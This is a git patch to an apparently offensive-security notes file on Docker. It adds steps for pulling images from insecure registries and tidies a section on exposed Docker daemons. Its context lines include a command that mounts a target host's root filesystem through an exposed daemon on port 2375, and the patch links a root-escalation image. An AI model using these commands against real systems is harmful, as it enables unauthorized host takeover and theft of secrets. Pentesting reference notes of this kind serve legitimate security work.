From aba2d2677663a6d83396ee77966f80df0c4722fb Mon Sep 17 00:00:00 2001
From: gurkenhabicht <info@intheopen.org>
Date: Sun, 21 Jan 2024 21:44:13 +0100
Subject: [PATCH] cleanup and additional information on how to pull images from
 an insecure docker registry

---
 Exploits/Containers/Docker.md | 32 ++++++++++++++++++++++----------
 1 file changed, 22 insertions(+), 10 deletions(-)

diff --git a/Exploits/Containers/Docker.md b/Exploits/Containers/Docker.md
index 3e9c9ab..89be3db 100644
--- a/Exploits/Containers/Docker.md
+++ b/Exploits/Containers/Docker.md
@@ -51,7 +51,27 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
 `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
 
 ```sh
-curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
+curl http://test.com:5000/v2/<REPO>/<APP>/manifests/<TAG>
+```
+
+### Download Images from the Remote Repository
+
+Remote repositories might need to be added to the insecure registries before you are able to pull from them
+
+```sh
+echo '{"insecure-registries": ["insecure-registry.com:5000"]}' >> /etc/docker/daemon.json
+```
+
+Restart the docker service afterwards and take a look at the insecure registries via 
+
+```
+docker info
+```
+
+Download an image via
+
+```sh
+docker pull insecure-registry:5000/repository-name/image-name
 ```
 
 ## Remote Docker Daemon
@@ -66,15 +86,7 @@ docker -H tcp://test.com:2375 exec <container> <cmd>
 docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
 ```
 
-
-## RCE via Exposed Docker Daemon
-
-Execute commands on socket
-
-```sh
-```
-
-* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
+Check out [root please](https://github.com/chrisfosterelli/dockerrootplease)
 
 ## Escape Container via Exposed Docker Daemon